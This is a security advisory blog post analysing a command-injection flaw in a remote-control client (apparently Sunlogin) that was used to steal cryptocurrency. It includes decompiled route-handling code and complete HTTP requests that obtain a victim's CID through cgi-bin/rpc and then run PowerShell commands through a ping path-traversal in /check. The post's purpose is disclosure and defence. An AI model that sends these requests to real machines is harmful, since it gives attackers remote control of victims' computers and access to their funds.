Web3 Security Breach: Hacker Exploits Remote Control Vulnerability to Steal Cryptocurrency

Recently, several web3 cryptocurrency holders have reported losing their digital assets while using remote control software.

The wallet address associated with the hacker is 0xbb3fd383d1c5540e52ef0a7bcb9433375793aeaf.

Last year, there was an incident involving a remote control software that experienced a service explosion due to a leakage of its client identification information (CID) and command injection vulnerability (CNVD-2022-10270/CNVD-2022-03672).

Whenever the software is launched, it automatically opens a random port number greater than 40000 as an HTTP service. In the event that the parameter cmd value starts with ping or nslookup in the /check route, any command can be executed. This allowed the attacker to send a C2 agent, enabling them to monitor the victim’s system over a long period of time.

Affected Versions

Personal Edition for Windows <= 11.0.0.33162

Simple Edition <= V1.0.1.43315

Analysis

Let’s take a look at login.cgi

v5 = (__int64 (__fastcall *)())operator new(0x50ui64); 
  v55 = v5; 
  v54 = 15i64; 
  v53 = 0i64; 
  v51[0] = 0; 
  sub_1400F0690(v51, "login.cgi", 9ui64); 
  v6 = sub_140E2D6BC(v5, v51); 
  v57 = &off_1410D3B20; 
  v58 = (char (__fastcall *)(__int64, __int64))sub_140E1EE50; 
  v59 = v52; 
  v60 = a1; 
  v61 = &v57; 
  v66 = (_QWORD *)v6; 
  if ( v6 ) 
  { 
    v7 = v6 + 8 + *(int *)(*(_QWORD *)(v6 + 8) + 4i64); 
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v7 + 8i64))(v7); 
  } 
  sub_140E2D85C(a1 + 55, &v66, &v57); 
  LOBYTE(v8) = 1; 
  sub_1400EEDC0(v51, v8, 0i64); 
  v56 = &v57; 
  v9 = (__int64 (__fastcall *)())operator new(0x50ui64); 
  v55 = v9; 
  v54 = 15i64; 
  v53 = 0i64; 
  v51[0] = 0; 
  sub_1400F0690(v51, (void *)"cgi-bin/login.cgi", 0x11ui64); 
  v10 = sub_140E2D6BC(v9, v51); 
  v57 = &off_1410D3B20; 
  v58 = (char (__fastcall *)(__int64, __int64))sub_140E1EE50; 
  v59 = v52; 
  v60 = a1; 
  v61 = &v57; 
  v66 = (_QWORD *)v10; 
  if ( v10 ) 
  { 
    v11 = v10 + 8 + *(int *)(*(_QWORD *)(v10 + 8) + 4i64); 
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v11 + 8i64))(v11); 
  } 
  sub_140E2D85C(a1 + 55, &v66, &v57); 
  LOBYTE(v12) = 1; 
  sub_1400EEDC0(v51, v12, 0i64); 
  v56 = &v57; 
  v13 = (__int64 (__fastcall *)())operator new(0x50ui64); 
  v55 = v13; 
  v54 = 15i64; 
  v53 = 0i64; 
  v51[0] = 0; 
  sub_1400F0690(v51, (void *)"cgi-bin/rpc", 0xBui64); 
  v14 = sub_140E2D6BC(v13, v51); 
  v57 = &off_1410D3B20; 
  v58 = sub_140E1C954; 
  v59 = v52; 
  v60 = a1; 
  v61 = &v57; 
  v66 = (_QWORD *)v14; 
  if ( v14 ) 
  { 
    v15 = v14 + 8 + *(int *)(*(_QWORD *)(v14 + 8) + 4i64); 
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v15 + 8i64))(v15); 
  }

Navigate to cgi-bin/rpc

Get the following route

v63 = (*(__int64 (__fastcall **)(_QWORD))(**(_QWORD **)(a1 + 8) + 104i64))(*(_QWORD *)(a1 + 8)); 
    sub_140320D80( 
      (int)&qword_1414049C0, 
      1, 
      (int)"..\\includes\\libsunloginclient\\client\\HttpDecideClientType.cpp", 
      (int)"CHttpDecideTcpClientType::DecideClient", 
      205, 
      "[Acceptor][HTTP] new RC HTTP connection %s,%s, plugin:%s, session:%s", 
      v63); 
    if ( (unsigned int)sub_140101DB0(v116, "login") 
      && strcmp(v61, "express_login") 
      && strcmp(v61, "cgi-bin/login.cgi") 
      && strcmp(v61, "log") 
      && strcmp(v61, "cgi-bin/rpc") 
      && strcmp(v61, "transfer") 
      && strcmp(v61, "cloudconfig") 
      && strcmp(v61, "getfastcode") 
      && strcmp(v61, "assist") 
      && strcmp(v61, "cloudconfig") 
      && strcmp(v61, "projection") 
      && strcmp(v61, "getaddress") 
      && strcmp(v61, "sunlogin-tools") ) 
      ... 
              sub_1400F05E0(v116); 
        goto LABEL_168; 
      } 
    } 
    if ( !(unsigned int)sub_140101DB0(v116, "login") 
      || !(unsigned int)sub_140101DB0(v116, "control") 
      || !strcmp(v61, "express_login") 
      || !strcmp(v61, "cgi-bin/login.cgi") 
      || !strcmp(v61, "cgi-bin/rpc") 
      || !strcmp(v61, "desktop.list") 
      || !strcmp(v61, "cloudconfig") 
      || !strcmp(v61, "check") 
      || !strcmp(v61, "transfer") 
      || !strcmp(v61, "getfastcode") 
      || !strcmp(v61, "assist") 
      || !strcmp(v61, "micro-live/enable") 
      || !strcmp(v61, "projection") 
      || !strcmp(v61, "getaddress") ) 
    { 
      v103 = *(_QWORD *)(a1 + 8);

As per the vulnerability information disclosed online, by obtaining the first authentication CID from the cgi-bin/rpc route, it is possible to distinguish the function by examining the action parameter.

When the action parameter is set to verify-haras, the function returns a verify_string.

if ( !(unsigned int)sub_140101DB0(v131, "verify-haras") ) 
  { 
    sub_1400F0690(Src, "{\"__code\":0,\"enabled\":\"1\",\"verify_string\":\"", 0x2Bui64); 
    LOBYTE(v22) = 1; 
    v23 = (*(__int64 (__fastcall **)(_QWORD, char *, __int64))(**(_QWORD **)(*(_QWORD *)(a1 + 416) + 288i64) + 144i64))( 
            *(_QWORD *)(*(_QWORD *)(a1 + 416) + 288i64), 
            v125, 
            v22); 
    sub_1400EEE40(Src, v23, 0i64, -1i64); 
    sub_1400F05E0(v125); 
    sub_1400EEC60(Src, "\",\"code\":0} ", 0xCui64); 
    v73 = 1; 
    CxxThrowException(&v73, (_ThrowInfo *)&stru_1412F7B30); 
  }

If the action parameter is set to login-type, the function returns information about the victim’s device.

if ( !(unsigned int)sub_140101DB0(v131, "login-type") ) 
  { 
    sub_1405ACBA0(v93); 
    v16 = "0"; 
    if ( (*(unsigned __int8 (__fastcall **)(_QWORD))(**(_QWORD **)(*(_QWORD *)(a1 + 416) + 288i64) + 112i64))(*(_QWORD *)(*(_QWORD *)(a1 + 416) + 288i64)) ) 
    ... 
    memset(Buffer, 0, sizeof(Buffer)); 
    sub_140150A60( 
      Buffer, 
      "{\"__code\":0,\"use_custom\":%d,\"code\":0,\"version\":\"%s\",\"isbinding\":%s,\"isinstalled\":%s,\"isprojection\"" 
      ":%s,\"platform\":\"%s\",\"mac\":\"%s\",\"request_need_pwd\":\"%s\",\"accept_request\":\"1\",\"support_file\":\"1\"" 
      ",\"disable_remote_bind\":\"%s\"} "); 
    if ( Buffer[0] ) 
    { 
      do 
        ++v6; 
      while ( Buffer[v6] ); 
      v4 = v6; 
    } 
    sub_1400F0690(Src, Buffer, v4); 
    v72 = 1; 
    CxxThrowException(&v72, (_ThrowInfo *)&stru_1412F7B30); 
  }

In addition to the above, there are two other parameters: fast-login and bind-request.

By examining the check route, an attacker can create malicious commands using ping or nslookup, thereby allowing them to achieve remote command execution.

The getaddress route enables the retrieval of the https service address mapped to a fixed port on the extranet. This address can be easily crawled by web asset search engines or scanned by attackers, thereby expanding the attack surface beyond the intranet.

Exploitation Process

Upon each startup, the rpc interface randomly selects a port number greater than 40000.

The initial step is to obtain the CID of the affected user/entity.

GET /cgi-bin/rpc?action=verify-haras HTTP/1.1 
Host: 10.211.55.3:49716 
Cache-Control: max-age=0 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9 
Connection: close

Afterward, the attacker can add a CID to the authentication cookie, which looks like this: Cookie: CID=Pvqsv5f5QDs8vYotYsUEFvTkqJuKeZIS. This allows them to execute any command on the victim’s computer.

GET /check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami+/all HTTP/1.1 
Host: 10.211.55.3:49716 
Cache-Control: max-age=0 
Upgrade-Insecure-Requests: 1 
Cookie:CID=Pvqsv5f5QDs8vYotYsUEFvTkqJuKeZIS 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9 
Connection: close

/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ipconfig

Access and view the victim’s system files.

Summary

As web3 infrastructure continues to develop, the high value of digital assets and the invisibility of web3 infrastructure make it an attractive target for hackers. They have shifted from traditional network security to stealing data within the web3 ecosystem, including stealing users’ digital assets. Many hackers now use 0day/1day attacks to infiltrate target facilities such as servers, personal hosts, wallet apps, and mobile clients. Their ultimate goal is to steal users’ digital assets.

To safeguard against such attacks, users are advised to keep their systems updated and patched, avoid clicking on links from unknown sources, and store their keys in isolated systems. With the Web3 landscape constantly expanding, it is imperative for projects to prioritize the safety of their users’ assets and adopt industry best practices, such as conducting comprehensive audits and regularly scanning for weaknesses to minimize the possibility of similar attacks occurring in the future.

Web3 Security Breach: Hacker Exploits Remote Control Vulnerability to Steal Cryptocurrency

Affected Versions

Analysis

Exploitation Process

Summary

Share:

More Posts

Numen Cyber of Singapore Forms Strategic Partnership with SINNET CLOUD HK LIMITED of Hong Kong

Web3 Security: ledgerhq/connect-kit supply chain attack warning

Use Wasm to Bypass Latest Chrome v8sbx Again

OctoPrint Remote Code Execution Vulnerability (CVE-2023–41047)

LET’S TALK!

We have the perfect security solutions for your industry.

Products

Resources

Services

Company

Social Media

Get in Touch

Request a Quote